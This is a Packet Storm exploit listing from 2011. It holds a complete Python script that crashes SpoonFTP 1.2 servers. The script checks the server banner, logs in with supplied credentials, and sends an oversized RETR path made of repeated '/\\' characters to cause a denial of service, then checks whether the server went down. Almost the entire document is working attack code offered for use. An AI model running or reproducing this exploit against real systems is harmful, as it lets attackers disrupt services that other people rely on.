SpoonFTP 1.2 Denial Of Service

2011-03-18T00:00:00
ID PACKETSTORM:99466
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-03-18T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
#  
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2  
#[+]Date: 03\18\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html  
#[+]Version: 1.2  
#[+]Tested On: WIN-XP SP3 Portuguese Brazil  
#[+]CVE: N/A  
#  
#  
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx  
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx   
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx   
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx   
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx  
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx  
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx  
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx  
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx  
#  
#Criado por C4SS!0 G0M3S  
#E-mail Louredo_@hotmail.com  
#Site www.exploit-br.org  
#  
#  
  
  
  
from socket import *  
import os  
import sys  
from time import sleep  
  
if os.name == 'nt':  
os.system("cls")  
os.system("color 4f")  
else:  
os.system("clear")  
  
  
def usage():  
print """  
  
===================================================  
===================================================  
==========Exploit Denial of Service SpoonFTP=======  
==========Autor C4SS!0 G0M3S=======================  
==========E-mail Louredo_@hotmail.com==============  
==========Site www.exploit-br.org==================  
===================================================  
===================================================  
  
"""  
  
if len(sys.argv) !=5:  
usage()  
print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]  
print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]  
sys.exit(0)  
  
host = sys.argv[1]  
porta = int(sys.argv[2])  
user = sys.argv[3]  
pasw = sys.argv[4]  
  
exploit = "/\\" * (6000/3)  
usage()  
print "\t\t[+]Connecting to Server "+host+"...\n"  
sleep(1)  
s = socket(AF_INET,SOCK_STREAM)  
try:  
s.connect((host,porta))  
print "\t\t[+]Checking if server is vulnerable\n"  
sleep(1)  
banner = s.recv(2000)  
if banner.find("SpoonFTP V1.2") == -1:  
print "\t\t[+]I'm sorry, server is not vulnerable:(\n"  
sleep(1)  
sys.exit(0x00)  
print "\t\t[+]Making Loging On Server\n"  
sleep(1)  
s.send("USER "+user+"\r\n")  
s.recv(200)  
s.send("PASS "+pasw+"\r\n")  
check = s.recv(2000)  
if check.find("230") == -1:  
print "\t\t[+]Error on Login, Check Your Username or Password\n"  
sleep(1)  
sys.exit(0)  
print "\t\t[+]Sending Exploit...\n"  
sleep(1)  
s.send("RETR "+exploit+"\r\n")  
s.close()  
print "\t\t[+]Submitted Exploit Success\n"  
sleep(1)  
  
print "\t\t[+]Checking if the exploit works\n"  
sleep(1)  
try:  
so = socket(AF_INET,SOCK_STREAM)  
s.connect((host,porta))  
print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"  
sleep(1)  
except:  
print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"  
sleep(1)  
  
  
except:  
print "\t\t[+]Error connecting to Server\n"  
sleep(1)  
`